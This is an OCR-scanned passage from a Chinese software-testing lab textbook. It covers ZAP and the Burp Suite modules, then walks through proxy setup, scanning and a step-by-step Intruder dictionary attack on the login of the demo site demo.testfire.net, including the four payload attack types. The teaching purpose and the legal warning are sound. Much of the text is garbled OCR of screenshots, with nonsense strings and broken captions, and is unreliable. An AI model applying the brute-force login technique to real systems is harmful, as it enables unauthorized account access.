lr o er jerk pe ri ieri Ir rr red rr e er an attacker's favonte target) 
S 
Pon 
URL http /!demo testfire net/bank/login aspx 
-一 Š 
ES e 
-一 一 一 一 i 


Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avond 
Examples of ixaries and frameworks hat make A easier to generate property encoded output include Microsoft's Anti-XSS ibrary. the OWASP ESAPI End 











图 18-55 查看 报告 


DS 专家 点 评 BEEN u 


ZAP 工具 包含 拦截 代理 、 自 动 处 理 、 被 动 处 理 、 暴力 破解 及 端口 扫描 等 功能 ， "TP 
爬虫 功能 也 被 加 入 进去 。ZAP 具备 对 网 页 应 用 程序 的 各 种 安全 问题 进行 检测 的 功能 ,首先 
要 确认 将 ZAP 加 入 代理 工具 中 ,安装 后 启动 ,让 浏览 器 通过 代理 对 其 网 络 数据 交换 进行 管 
理 , 之 后 再 做 一 些 相关 测试 。 

测试 前 最 好 能 通过 分 析 来 修改 测试 策略 ,以 避免 不 必要 的 检查 ,然后 再 选择 开始 扫描 来 
对 站 点 进行 评估 。 

ZAP 的 优点 除了 它 在 进行 扫描 操作 时 所 表现 出 来 的 抓 取 能 力 ,还 表现 在 它 的 扫描 报告 
中 。 这 是 其 他 安全 扫描 工具 不 具备 的 功能 ,初学 者 多 看 ZAP 报告 ,对 于 了 解 Web 安全 有 很 
多 的 好 处 。 

测试 人 员 可 以 通过 修改 预 置 参 数 来 熟悉 各 种 攻击 原理 ,这 对 于 测试 人 员 测试 技能 方面 
的 提高 也 非常 有 帮助 。 
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请 记 住 一 条 原则 性 忠告 : 不 要 在 不 属于 你 的 站 点 或 应 用 程序 上 使 用 安全 测试 工具 , 因 
为 这 些 攻击 可 能 涉及 法 律 上 的 纠纷 。 不 管 是 这 里 介绍 的 ZAP 工具 ,还 是 后 面 介绍 的 其 他 测 
试 工具 ,都 必须 记 住 这 条 忠告 。 


df mos 


使 用 ZAP 工具 对 本 书 实验 1 中 提供 的 网 站 进行 安全 渗透 测试 ,并 分 析 结 果 。 
提醒 : 可 以 在 http://books. roqisoft. com/wstool 中 查阅 更 多 的 Web 安全 扫描 与 渗透 


攻击 工具 的 使 用 。 
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读书 笔记 
44 8; ^4; e@; «4: e@; «4: e$: ^4; e$: ^4; e$: ^4; e: 


读书 笔记 Name: Date: 








励志 和 名句: There's only one corner of the universe you can be sure of 


improving « and that's your own self. 





这 个 宇宙 中 只 有 一 个 角落 你 肯定 可 以 改进 , 那 就 是 你 自己 。 


















































A 安全 集成 攻击 
平台 Burp Suite 训 练 | 


Ezenn ) 


Burp Suite 是 用 于 攻击 Web 应 用 程序 的 集成 平台 , 它 包 含 了 许 
多 工具 。 从 最 初 的 应 用 攻击 面 (attack surface) 分 析 到 寻找 并 挖掘 漏 
洞 ,这 些 工具 都 无 缝 结合 ,给 整个 测试 过 程 提供 了 强大 的 支持 。 

本 实验 指导 读者 如 何 使 用 Burp Suite 工具 进行 安全 渗透 测试 , 通 
过 实例 讲解 如 何 通 过 字典 攻击 获取 网 站 合法 账户 与 密码 。Burp Suite 
功能 很 强大 ,读者 可 以 自己 动手 体会 。 


19.1 Burp Suite 主要 功能 


Burp Suite 主 窗口 如 图 19-1 所 示 。 





Ë" TECN 


No proxy listeners are currently running - go to the Options tab to enable a listener 


Spider | Scanner | intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Options | Alerts. 


° HM eee mz 

















19-1 Burp Suite 主 窗口 
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Burp Suite 常用 菜单 介绍 如 下 。 

(1) Proxy: 是 一 个 拦截 HTTP/HTTPS 的 代理 服务 器 ,作为 一 个 在 浏览 器 和 目标 应 用 
程序 之 间 的 中 间 人 ,允许 用 户 拦截 查看、 修改 在 两 个 方向 上 的 原始 数据 流 。 

(2) Spider; 是 一 个 应 用 智能 感应 的 网 络 爬 虫 , 它 能 完整 地 枚 举 应 用 程序 的 内 容 和 功能 。 

(3) Scanner: 是 一 个 高 级 的 工具 ,执行 后 能 自动 发 现 Web 应 用 程序 的 安全 漏洞 。 

(4) Intruder: 是 一 个 定制 的 高 度 可 配置 的 工具 ,对 Web 应 用 程序 进行 自动 化 攻击 ,如 
枚 举 标识 符 、 收 集 有 用 的 数据 ,以 及 使 用 模糊 测试 技术 探测 常规 漏洞 。 

(5) Repeater: 是 一 个 靠 手 动 操 作 来 补 发 单独 的 HTTP 请 求 , 并 分 析 应 用 程序 响应 的 
工具 。 

(6) Sequencer: 是 一 个 用 来 分 析 那 些 不 可 预知 的 应 用 程序 会 话 令 牌 和 重要 数据 项 的 随 
机 性 的 工具 。 

(7) Decoder: 是 一 个 进行 手动 执行 或 对 应 用 程序 数据 者 智能 解码 编码 的 工具 。 

(8) Comparer: 是 一 个 实用 的 工具 ,通常 是 通过 一 些 相 关 的 请 求 和 响应 得 到 两 项 数据 
的 一 个 可 视 化 的 “差异 ”。 


19.2 安装 Burp Suite 


19.2.1 环境 需求 


Burp Suite 需要 在 Java 环境 才 可 以 运行 ,所 以 首先 安装 Java JDK 或 者 JRE,Burp Suite 
才能 正常 启动 。 这 里 提供 Java 官方 下 载 地 址 ,下 载 成 功 后 默认 安装 即 可 。Java 下 载 地 址 为 





Download Burp Suite "e| 
un| 
Please choose the edition of Burp Suite that is right for you. Help me choose » 可 : 
£ e) 
Professional 3 m 
Free Edition Edition S 
= s= o 
万 


Burp Proxy 
Burp Spider 
Burp Repeater 
Burp Sequencer 
Burp Decoder 
Burp Comparer 


2 553993 


Burp Intruder 
Burp Scanner 
Save and Restore 
Search 


Target Analyzer 


5olg J 


Content Discovery 


Task Scheduler 


Release Schedule 





Buy now 


now ~ 








| Download n 





图 19-2 下 载 安装 文件 
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http: //java. sun. com/j2se/downloads. html. 
19.2.2 安装 步骤 


在 Windows 系统 下 安装 Burp Suite 的 步骤 如 下 。 

先 下 载 安装 包 Burp Suite free vl. 6. jar. 建议 下 载 免 费 版 的 进行 学 习 。 下 载 地 址 为 
http://portswigger. net/burp/download. html。 如 图 19-2 所 示 , 单 击 Download now 按钮 
下 载 安装 包 。 

下 载 完 成 后 ,双击 已 下 载 文件 或 在 cmd 下 设置 好 目录 之 后 运行 命令 java -jar burpsuite_ 
free v1. 6. 01. jar, 就 能 够 启动 Burp Suite, 


19.3 工作 流程 及 配置 


Burp Suite 是 Web 测试 应 用 程序 的 良好 工具 之 一 ,其 多 种 功能 可 以 帮助 使 用 者 执行 各 
种 任务 ,如 请 求 拦截 和 修改 .扫描 Web 应 用 程序 漏洞 .以 暴力 破解 登录 表单 .执行 会 话 令 牌 
等 多 种 随机 性 检查 等 。 

Burp Suite 能 高 效率 地 与 单个 工具 一 起 工作 。 例 如 ,一 个 中 心 站 点 地 图 汇总 收集 目标 
应 用 程序 信息 ,并 通过 确定 的 范围 来 指导 单个 程序 工作 。 处 理 HTTP 请 求 和 响应 时 , 它 可 
以 选择 调用 其 他 任意 的 Burp Suite 工具 。 例 如 ,代理 记录 的 请 求 可 被 Intruder 用 来 构造 一 
个 自 定义 的 自动 攻击 的 准则 ,也 可 被 Repeater 用 来 手动 攻击 ,同样 可 被 Scanner 用 来 分 析 
漏洞 ,或 者 被 Spider 用 来 自动 搜索 内 容 。 应 用 程序 是 “被 动 地 ”运行 ,而 不 是 产生 大 量 的 自 
动 请 求 。Burp Suite 把 所 有 通过 的 请 求 和 响应 解析 为 连接 和 形式 ,同时 站 点 地 图 相应 更 新 。 
由 于 完全 控制 了 每 一 个 请 求 ,所 以 可 以 以 一 种 非 入 侵 的 方式 来 探测 敏感 的 应 用 程序 。 当 浏 
览 网 页 (取决 于 定义 的 目标 范围 ) 时 ,通过 自动 扫描 经 过 代理 的 请 求 就 能 发 现 安全 漏洞 。 


19.3.1 Burp Suite 框架 与 工作 流程 


Burp Suite 支持 手动 的 Web 应 用 程序 测试 的 活动 ,可 以 有 效 地 结合 手动 和 自动 化 技 
术 , 可 以 完全 控制 所 有 的 Burp Suite 执行 的 行动 ,并 提供 有 关 所 测试 的 应 用 程序 的 详细 信息 
和 分 析 。 图 19-3 所 示 是 Burp Suite 的 测试 框架 图 。 

代理 工具 可 以 说 是 Burp Suite 测试 流程 的 心脏 , 它 可 以 通过 浏览 器 来 浏览 应 用 程序 , 捕 
获 所 有 相关 信息 ,并 轻松 地 开始 进一步 的 行动 。 


19.3.2 Burp Suite 配置 代理 


在 开始 使 用 Burp Suite 之 前 ,需要 配置 与 Burp Suite 代理 相关 的 选项 。 如 图 19-4 所 
m ,依次 选择 Proxy Options, HEA Bu t 92 ifii , 
选择 本 地 代理 ,默认 是 已 经 配置 好 的 ,如 果 端 口 有 冲突 可 以 修改 端口 ,如 图 19-5 所 示 。 


19.3.3 浏览 器 代理 配置 


在 Burp Suite 工具 上 配置 完成 代理 后 ,还 需要 在 Windows 的 浏览 器 上 配置 Burp Suite 
为 代理 服务 器 。 有 具体 配置 方法 与 18. 3. 1 节 类 似 。 
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图 19-3 ”测试 框架 图 
Wi Burp Site Free ird - 
Burp intruder Repeater Window Help 
Target Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Options | Alerts 








intercept | HTTP history | WebSockets history 





Proxy Listeners 


Burp Proxy uses listeners to receive incoming HTTP requests from your browser. You will need to configure your browser to use one of th 
proxy server. 





回回 











Each installation of Burp generates its own CA certíficate that Proxy listeners can use when negotiating SSL connections. You can i 
certificate for use in other tools or another installation of Burp. 








CA certificate... 











194 配置 界面 
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Ki Burp Suite Free Edition v1.6 ——— Eer 3 T 
Burp Intruder Repeater Window Help 
Target Spider | Scanner | intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Options | Alerts 





intercept | HTTP history | WebSockets history 


图 Proxy Listeners 
回 Burp Proxy uses listeners to receive incoming HTTP requests from your browser. You will need to configure your browser to use one of the 
proxy server 


n 





Running | interface | invisible | Redirect | Certificate | 


= | & 1270018080 O . Perhost. 












Ei Edit proxy listener 
Request handing | Certificate. 


[一 








[Qi] These settings control how Burp binds the proxy listener 


Each installat 
certificate for u: Didtopot 18080 
CA certif Bind to address: @ Loopback only 


© AlI interfaces 


(2) Intercept Cli © Specific address: | 127.0.0.1 ij 

















图 19-5 配置 代理 


19.4 Proxy 工具 


Burp Suite 的 所 有 工作 都 基于 代理 功能 。 选 择 Proxy 选项 卡 , 它 包含 4 个 子 选 项 卡 ,分 
别 为 Intercept, HTTP history, WebSockets history 和 Options, 

(1) Intercept 选项 卡 为 拦截 设置 选项 ,如 图 19-6 所 示 。 单 击 Intercept is on 按钮 可 以 
选择 拦截 请 求 和 响应 。 单 击 Forward 按钮 可 以 将 响应 的 内 容 送 回 到 浏览 器 , 单 击 Drop 按 
钮 则 不 会 将 响应 的 内 容 送 回 。 单 击 Action 选项 可 以 拦截 选择 之 后 的 操作 。 下 面 的 Raw, 
Params, Headers, Hex 选项 卡 可 以 切换 所 显示 的 内 容 。 


[Eee 
eret [mr [ spec | scanner [venae [ repeater | sequencer [ Decote | comparer | txsenoe | optons | aens 
feeee [reato | wehsockets hatory [ tns | 

















parna S matres 


图 19-6 Intercept 选项 卡 
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(2) 在 HTTP history 选项 卡 里 可 以 看 到 HTTP 请 求 的 历史 ,用 户 可 以 过 滤 ,或 者 右 击 
并 选择 高 亮 或 注释 自己 所 需要 的 记录 。 单 击 Filter 域 ,可 以 选择 要 过 滤 的 内 容 , 如 图 19-7 
所 示 。 

Burp intruder Repeater Window Heb 


Target [aa er | scanner | niruser | eposter | sequencer | pecoser | comparer [ stenger | opsons | awns 
sev Jenae | weesoctets nistory | opens 


Fiter: Hiding CSS, image and general binary content 
































图 Fiter by request type. Fiter by MIME type Fiter by status code 

me ye LÀ 

加 [D Show only in-scope tems. gm  @ Otmertext | 国 2x [success] 
C) Hide tems without responses. 国 scpt — C) mages 国 3»x [redirection] 
C) Show oniy parameterized requests | | XML 团 Fish | 国 xx [request eror] 


目 css —— J Omerbnay | | @ xx server error] 





Fiter by search term Fiter by fie extension. Fiter by annotation. Fiter by listener. 
f pl 
B Show only | aep ssp dep pto (D Show only commented tems — 
se Ouse apm — | | E showony highighted tems x 
| E) Case sensitive © Negative search = - | 





sova) ea) 





图 19-7 HTTP history 选项 卡 


选择 特定 的 记录 后 右 击 ,可 以 选择 高 亮 或 注释 相应 的 记录 ,如 图 19-8 Bron o 







































dntercept.  WebSockets history | Options. 
Fiter Hiding CSS, mage and general binary content 
Method [URL Params |Edted Staus  |Lengh |MMEtype |txenson |Tte | Comment 
GET 1 http //demo testfre net/ 
er 1 g [M 
GET , g Spider from here. Atoro Mutual. 
GET t G Do an active scan  Attoro Mutual. 
GET detsut aspx Q | Dea passwe scan asx Aloro Mutat 
GET default aspx G Send to intruder Cte aspx 
GET jppcricheck srt g Send to Repeater Cii st 
pom GET 'apitoolbox/geturi php?h«9EBS4AA466. 国 Send to Sequencer php 
GET riendphoto/nqq 日 Send to Comparer (request) 
POST /cgibinaqshow_user_props_nfo a Send to Comparer (response) 
lw Show response n browser =a 
Request n browser > 
1 | Engagement iook | 
[-CC3CCHNENNEEENL— BH | 
CRT / RTL Ada comment 
Hos: deao.testfire.net N 
Proxy-Conmection: keep-alive x 
Cache-Control: max-age=0 Deite tem 
Accept: tere/nemt yapplteatenyzhealtzal applicacion/z] Ciar natoy 
User-Agent: Mosilla/S.0 (Windows NT 6.3; WOW&4) Apple| cro une Chrcne/43.0.2357.134 Satari/s37.36 
Copy as curi commana 
Cookie: ASP.NET SessionIdemdidtatszsOstyupnrtffad5; al Copylis 
Save tem 
Proxy history hep 

















图 19-8 高 亮 或 注释 功能 


(3) 在 WebSockets history 选项 卡 里 用 户 能 够 看 到 WebSockets 请 求 ,其 功能 和 HTTP 
history 选项 卡 类 似 , 故 不 再 多 做 介绍 。 

(4) Options 选项 卡 在 前 文中 也 进行 了 介绍 ,也 不 再 说 明 。 

用 户 也 可 以 在 浏览 器 中 查看 请 求 记录 。 只 需 在 地 址 栏 里 输入 Burp, 并 单 击 Proxy 
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History 项 ,如 图 19-9 所 示 。 


















Proxy History 






































































































































E ]Host JURL [Extension Moaea ] 
ü ]httoidemo testira net Y 1 I | 
B [ttp demo teste not. y I | 
a ]http demo testfre net y I | 
上 ttp demo testhre net y [ I | 
Ë ]http //demo tesffire net Y [ T | 
le [ttp demo testfire net spx I | 
区 [Pito demo testire net aspx I | 
g [itip Mogn Ive com st | 
fip config pinyin sogou com tooibox getur php? pho 


CSB4AA4663ACS3AA2C84E6FE2945A128v=7 6 0 59788r=0000_sogo 
| pinyin 16 0 5978 1434017887 
Jnenapotornaa J 
rr | 
ems 
suppiyd-00728g ud- COEICF oNa2yaSSBF WMCIRGUME2D 
rr Ean voy Zo dito 
ip us sj qq com [wabservcesigeti'CDownOnOf doq S358 1147 
hit img! | aq com. ['esmsustantsciütrupdate ru. 



























[Rip /shn photo qq com. 
n [nto /cient show qq com 
g [ip Ic pc qq com 















fiip Te pc qq com. fico ibusan? 
-208supplydi-30072&9ud-CQFjCFOzN&ZdyziSSOF 1MCTRGUIwB2B| 
Tyi *hpto/goczE xnawv3y20xaE diektloñdm-0 


Pip ws sj qq com T wcbservcosupdnteCount do 


















































图 19-9 在 浏览 器 中 查看 请 求 记录 


19.5 Spider 工具 


Burp Spider 是 一 个 自动 获取 Web 应 用 的 工具 。 它 利用 许多 智能 的 算法 来 获得 应 用 的 
内 容 和 功能 。 用 户 只 需 在 HTTP history 选中 一 个 请 求 , 然 后 右 击 并 选择 Spider from here 
命令 ,如 图 19-10 所 示 ,弹出 的 对 话 框 提示 是 否 将 所 选 内 容 添加 到 疏 取 范围 内 ,选择 Yes, Fë 
序 便 会 从 所 选 起 点 开始 怜 取 内 容 。 


Target Spider | Scanner | intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Options | Alerts 
intercept WebSockets history | Options 








Fiter. Hiding CSS, image and general binary content 
Host Method |URL Params | Edied |Status |Length | MMEtype 








- Engagement tools > 


Show new history window 
re 
mei i 
|Host: demo.testfire.net Clear history 
m emus nama DIN 
lAecept: text/html,application/| ,image/webp,*/*;q-0.8 
|User-Agent: Mozilla/S.0 (Wi Save tem 37.36 (KHTML, like Gecko) Chrome/43.0.2357.134 S| 
eee — 
lAccept-Language: zh-CN, -| mp 























图 19-10 FER 


323 


x 


324, 软件 测试 实验 实 训 指南 
`. 


运行 过 程 中 ,切换 到 Spider 选项 卡 ,用 户 可 以 看 到 并 控制 程序 运行 的 状态 ,如 图 19-11 
所 示 。 用 户 也 可 以 事先 在 该 界面 配置 好 怜 取 的 范围 。 











(2) Spider Status 


Use these settings to monitor and control Burp Spider. To begin spidering, browse to the target. 
f branch”. 


Requests made: 119 
Bytes transferred: 1,141,728 
Requests queued: 0 
Formsqueued: 0 





(2) Spider Scope 


加 @ Use suite scope [defined in Target tab] 
© Use custom scope 








图 19-11 ë$ FB Be WL 


切换 到 Target AWRA LUE SER t, nT DL d AE ke IE ES pq RE An E] 19-12 
所 示 。 切 换 到 Scope f xii -F nf A f A DC E 。 








Fiter Hiding not found tems; hiding CSS, mage and general binary content; hiing 4xx responses; hiding empty folders 


> Mp licreatvecommona org Host | Metod | URL [Params |Stsus a|ieng |MMEtpe | TA 
> nap /domo-anaytcs testtre net Mapema lestie nat OET I 











> hitp./fpdownioad macromedia com 
> http iñmbtOn blunted co uk 

> hip'iimierosoft com 

> http i/schemes microsoft com 

> http schemes xmisoap org 
pwww adobe com 




































"ma 
> hip Www .aloromutual com Do 
> Mipiwww certorg — 
> hp www macromeda com : 
P hap /www microsof com 
> http Iwww netscape com — 
> hap www newspapersyndicatons tv | Show response in browser 
P Miüpiw ww. wa org dmin/clients.xis Hrrp/i.| — Péquestinbrowser L2 —Q 
hapywvww watchfe com es Engagement ooi > 
-Language: en (Cep nia pa 
gent: Mozilla/5.0 (compa| Add comment |a; rraaeney/s ol 
E... ds 
DSessiondmani| Deetetem 3702; amUserid 
amcredioffere; lang" Copy UR. 
Copy as curi command. 
Copy inis 
Save tem 
Ste map nep 
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19.6 Scanner 工具 


19.6.1 Scanner 使 用 介绍 


Burp Scanner 是 一 款 自动 寻找 Web 应 用 漏洞 的 工具 。Scanner 的 设计 是 为 了 满足 
Burp 的 用 户 驱 动 测试 工作 流 。 当 然 , 用 户 也 可 以 选择 将 Burp Scanner 视 为 和 大 部 分 漏洞 扫 
描 工 具 一 样 的 一 款 单 击 式 扫 描 工 具 , 不 过 后 者 会 有 很 多 弊端 。 推 荐 用 户 在 驱动 测试 工作 流 
中 使 用 该 工具 ,因为 这 种 使 用 模式 可 以 控制 每 条 请 求 或 者 响应 ,能 够 帮助 用 户 发 现 更 多 的 
错误 。 

Scanner 有 两 种 扫描 模式 : 主动 扫描 和 被 动 扫 描 。 主 动 扫描 是 指 程序 修改 用 户 的 初始 
请 求 , 向 服务 器 发 送 大 量 新 的 请 求 , 以 找 出 应 用 的 缺陷 。 被 动 扫 描 则 不 会 向 服务 器 发 送 新 的 
请 求 ,而 是 根据 已 有 的 请 求 和 响应 来 推断 出 应 用 缺陷 。 默 认 情况 下 ,工具 以 被 动 扫 描 的 方式 
运行 。 

19.6.2 Scanner 操作 
在 Target 选项 卡 的 Site map 子 选 项 卡 或 者 在 HTTP history 选项 卡 中 选中 一 个 主机 、 


目录 或 者 文件 , 右 击 可 以 选择 Do an active scan 或 者 Do a passive scan 命令 ( 见 图 19-13). 
即 可 开始 响应 的 扫描 。 


figu ooo | spee | scanner | virer | nepeater J sequencer | pecoder | comparer | eriender J optons | miers. 


Fiter Hiding not found tems; hiding CSS, mage and general binary content, hiding 4xx responses; hiding empty folders. 














> http Jicreatvecommons org 
> htp Jldemo-anatytics testfre net 





[news ews] erg [uut [m 
“Wm ANC w 














> hit/ww w.aloromulual com. 
P http www certorg 

> http www macromedia com 

P http www merosoft com 

Np www netscape com 

P http www newspapersyndicatons tv 
hapywww waorg 

hpJwww watchfre com 





























Add commal rident/5. 0; 





1933 ”进行 扫描 


切换 到 Scanner 选项 卡 ,可 以 看 到 并 控制 扫描 的 运行 情况 ,如 图 19-14 所 示 。 

切换 到 Results 子 选 项 卡 ,可 以 看 到 扫描 结果 ,如 图 19-15 所 示 。 结 果 以 树 形 显示 ,用 户 
可 以 选择 查看 漏洞 的 具体 位 置 以 及 修改 建议 。 

用 户 可 以 在 Live scanning 子 选项 卡 中 设置 是 否 自动 进行 主动 扫描 或 者 被 动 扫 描 , 也 可 
以 在 Options 子 选项 卡 中 设置 响应 的 扫描 选项 ,这 里 不 做 详细 解释 。 
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图 19-15 扫描 结果 


19.6.3 Scanner 报告 


在 Results 子 选项 卡 中 选择 要 导出 的 内 容 , 右 击 并 选择 Report selected issues 命令 ,如 
图 19-16 所 示 。 








Scan queue | Live scanning | Options 





Delete selected issues. 
Scan results hep 














图 19-16 ”选择 导出 内 容 


报告 分 为 HTML 或 者 XML 格式 ,如 图 19-17 所 示 。 
选择 所 需 保存 的 内 容 , 输 入 保存 地 址 并 单 击 Next 按钮 ,如 图 19-18 所 示 。 
得 到 的 报告 样式 如 图 19-19 所 示 。 
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Choose the format for the report. 


@ m 
© xu 
国 Base64-encode requests and responses 





图 19-17. 选择 导出 格式 


图 Select the fiie where the report wil be saved. 


Seedfie. | | 


Specify the tite and structure to use in the report. 





Report titie Burp Scanner Report 


Issue organization Bytype ig 
Table of contents levels | 2 mj 











Back. Next. 
图 19-18 导出 选项 
Burp Scanner Report [z] BURP 


Summary 


The table below shows the numbers of issues identified in different categories Issues are classified according to severity as High. Medium, Low or Information. 
This reflects the likely impact of each issue for a typical organization. Issues are also classified according to confidence as Certain, Firm or Tentative. This reflects 
the inherent reliability of the technique that was used to identify the issue. 








The chart below shows the aggregated numbers of issues identified in each category. Solid colored bars represent issues with a confidence level of Certain, and the 
bars fade as the confidence level falls 














图 19-19 报告 样式 
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19.7 Intruder 工具 


Burp Intruder 可 以 用 于 进行 模糊 测试 .暴力 猜 解 .字典 攻击 用 户 名 和 密码 ,以 获取 用 户 
相关 信息 。 下 面 用 测试 网 址 http://demo. testfire. net/ 作 为 实例 来 讲解 Burp Suite 字典 攻 
击 \ 破 解 用 户 名 和 密码 的 过 程 。 

该 网 站 公布 的 用 户 名 和 密码 分 别 为 jsmith 和 demo1234。 


19.7.1 字典 攻击 步骤 


CD 用 配置 好 代理 的 浏览 器 浏览 测试 网 址 http://demo. testfire. net, 此 时 确保 Burp 
Suite 上 的 Intercept is off( 监 听 是 关闭 的 ) 为 可 用 状态 ( 见 图 19-20) ,否则 浏览 将 被 拦截 ,不 
能 正常 访问 。 





















































图 19-20 Burp Suite 拦截 设置 


(2) 待 页 面 跳 转 到 登录 界面 后 ,打开 Burp Suite 上 的 监听 功能 Intercept is on。 
(3) 输入 username 和 password, 单 击 Login 按钮 ,此 时 执行 的 登录 操作 将 被 Burp 
Suite 监听 (第 一 次 可 用 正确 用 户 名 和 密码 登录 ,后 续 可 以 匹配 检测 ,如 图 19-21 所 示 。 





e = 
— LLL 


AltoroMutual >= y 











19-21 浏览 测试 网 站 


(4) 右 击 并 选择 Send to Intruder 命令 ,如 图 19-22 所 示 。 
(5) 以 上 操作 会 将 请 求 信息 发 送 给 Intruder 模块 ,进入 Intruder 选项 卡 , 配 置 Burp 
Suite 发 起 暴力 猜 解 的 攻击 ,在 Target 选项 卡 中 可 以 看 到 已 经 设置 好 了 要 请 求 攻击 的 目标 ， 
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| (merce 





Filter. Hiding CSS, image and general binary content 



































如 图 19-23 所 示 。 








| | 
| amsa] "sos [Pte Jogos] o | 


(2) Attack Target 
Configure the details of the target for the attack. 





Host: demo .testfire.net. 


IN 


E Use HTTPS 





图 19-23 已 设置 好 要 请 求 攻击 的 目标 


(6) 进入 Positions 选项 卡 ,可 以 看 到 之 前 发 送 给 Intruder 的 请 求 。Intruder 对 可 进行 
猜 解 的 参数 进行 了 高 亮 显示 ,如 图 19-24 所 示 。 在 猜 解 用 户 名 和 密码 的 过 程 中 ,只 需 用 户 名 
和 密码 作为 参数 不 断 改变 ,于 是 用 户 需要 相应 地 配置 Burp。 

(7) 单 击 右 下 角 的 Clear 按钮 ,将 会 删除 所 有 待 猜 解 参 数 。 接 下 来 需要 配置 Burp。 在 
这 次 攻击 中 只 把 用 户 名 和 密码 作为 参数 ,选中 本 次 请 求 中 的 username( 本 例 中 用 户 名 是 指 
admin) ,然后 单 击 Add 按钮 。 同 样 将 本 次 请 求 中 的 password 添加 进去 。 这 样 操作 之 后 ,用 
户 名 和 密码 将 会 成 为 第 一 个 和 第 二 个 参数 。 一 旦 操作 完成 ,输出 应 该 如 图 19-25 所 示 , 

(8) 选择 攻击 类 型 。 在 Attack type 选项 里 有 4 种 攻击 方式 ,分 别 是 Sniper, Battering 
ram,Pitchfork 和 Cluster bomb。 下 面 分 别 介绍 这 4 种 攻击 类 型 的 含义 。 
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Ki Burp Suite Free Edition v1.6. 
|| Burp intruder. Repeater Window Help 
Target Proxy I Spider Scanner 
| Repeater Sequencer Decoder Comparer Extender | Options | Alens 
mm 
Target Payloads | Options. 





(2) Payload Positions 


Configure the positions where payloads will be inserted into the base request. The attack type determines the way in 
which payloads are assigned to payload positions - see help for full details. 





Attack type: (Sniper 


POST /bank/login.aspx HTTP/1.1 

Host: demo.testfire.net 

User-Agent: Mozilla/S.0 (Windows NT 6.1; WOW64; rv:24.0) 
Gecko/20100101 Firefox/24.0 

Accept: 

text/html, application/xhtmléxml, application/xml; q=0.9, */*;q*0.8 
Accept-Language: zh-cn, zh; q=0.8, en-us; q=0.5, en; q-0.3 
Accept-Encoding: gzip, deflate 

Referer: http://demo.testfire.net/bank/login.aspx 
Cookie: ASP.NET SessionId-BERWÉOBEPSRONNISSREVENENIS 
amseasionTd= g 

amUser Info 

Connection: keep-alive 

Content-Type: application/x-wwv-form-urlencoded 
Content-Length: 38 


| iia BEBE pass v- BOE c ns vom: c -ERS 




















| [zJ (59) >J >J [nee a search tem 


6 payload positions 




















图 19-24 Positions 选项 卡 








Payload Positions 


Configure the positions where payloads will be inserted into the base request. The attack type determines the way in 
which payloads are assigned to payload positions - see help for full details 


Attack type: | Sniper. ij 


POST /bank/login.aspx HTTP/1.1 T) || ads 
Host: demo.testfire.net 

User-Agent: Mozilla/S.0 (Windows NT 6.1; WOW64; rv:24.0) = 
Gecko/20100101 Firefox/24.0 

Accept: 

text/html, application/xhtmlexml,application/xml;q-0.9, */*;q=0.8 
Accept-Language: zh-cn,zh;q-0.8, en-us;q-0.5,en;q-0.3 
Accept-Encoding: gzip, deflate 

Referer: http://demo.testfire.net/bank/login.aspx 

Cookie: ASP.NET SessionId-ptvfcbrpSaohm4S5xfvkkcrl; 
lamSessionId-172136325633; 

amUser Info"UserName-YWRtal4" cPassvordeYURtaV4" 

Connection: keep-alive 
Content-Type: application/x-wwi 
Content-Length: 38 


uia- BEES spas v-SEBEBEIS cb: nsubmit-Login 





















































form-urlencoded 























d 
(25) (59) >J [> J [Te a search tem | Omatches [ Clear | 
2 payload positions Length: 616 














图 19-25 添加 用 户 名 和 密码 界面 
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* Sniper 攻击 类 型 需要 一 个 负载 集合 (字典 ) 。 这 种 类 型 基于 原始 请 求 ,每 次 用 负载 集 
合 中 的 一 个 值 去 替代 一 个 待 攻击 的 原始 值 , 产 生 的 总 共 请 求 数 为 待 攻击 参数 个 数 与 
负载 集合 基数 的 乘积 ,这 种 攻击 类 型 适用 于 需要 模糊 攻击 的 时 候 。 例 如 ,用 户 输入 
的 原始 请 求 中 username 一 a，passwd 一 b, 而 选用 的 负载 集合 为 {1,2} ,那么 将 会 产生 
4 个 新 的 请 求 如 下 。 


username = 1, passwd - b 

username = 2, passwd = b 

username = a, passwd = 1 

username - a, passwd - 2 

Battering ram 攻击 类 型 需要 一 个 负载 集合 (字典 ) ,这 种 攻击 类 型 会 将 负载 集合 里 面 
的 每 个 值 同时 赋 给 所 有 的 参数 ,最 后 所 产生 的 请 求 的 个 数 是 负载 集合 的 基数 。 上 例 
的 情况 变 为 


username = 1, passwd- 1 

username = 2, passwd- 2 

Pitchfork 攻击 类 型 需要 的 负载 集合 的 个 数 等 于 待 破解 参数 的 个 数 ( 最 大 值 为 20 
个 ) ,这 种 攻击 类 型 需要 给 每 个 参数 指定 一 个 负载 集合 ,每 条 请 求 是 由 每 个 参数 轮流 
取 各 自负 载 集 合 里 面 的 值得 到 的 。 负 载 集合 的 基数 大 小 不 一 样 时 ,最 后 所 有 的 请 求 
的 个 数 由 负载 集合 基数 的 最 小 值 决 定 。 如 果 用 户 输入 的 原始 请 求 中 username a. 
passwd- b, payloada— (1 ,2) .payload2— (3.4.5) ,那么 会 产生 两 个 请 求 : 


username = 1, passwd = 3 

username = 2, passwd = 4 

Cluster bomb 攻击 类 型 需要 的 负载 集合 的 个 数 也 等 于 待 破解 参数 的 个 数 (最 大 值 
为 20 个 ) ,和 上 一 种 攻击 类 型 类 似 , 这 种 攻击 类 型 需要 给 每 个 参数 指定 一 个 负载 
集合 ,但 是 最 后 生成 的 所 有 请 求 是 各 个 参数 取 值 的 所 有 组 合 ,产生 的 请 求 个 数 是 
所 有 负载 集合 基数 的 乘积 ,这 种 攻击 类 型 最 为 常用 。 如 果 用 户 输入 的 原始 请 求 中 
username 一 aypasswd 一 b,payloada 一 {1 .2) .payload2 — (3.4.5) ,那么 会 产生 6 个 
WPR: 


username = 1, passwd = 3 








username = 1, passwd = 4 
username = 1, passwd = 5 
username = 2, passwd = 3 
username = 2, passwd = 4 
username = 2, passwd = 5 
(9) 进入 Payloads 子 选 项 卡 ,选择 Payload set 的 值 为 1, 单 击 Load 按钮 加 载 一 个 包含 
诸多 用 户 名 的 文件 (自己 准备 ) 。 本 例 使 用 一 个 很 小 的 文件 来 演示 ,加载 之 后 用 户 名 文件 中 
的 用 户 名 如 图 19-26 所 示 。 
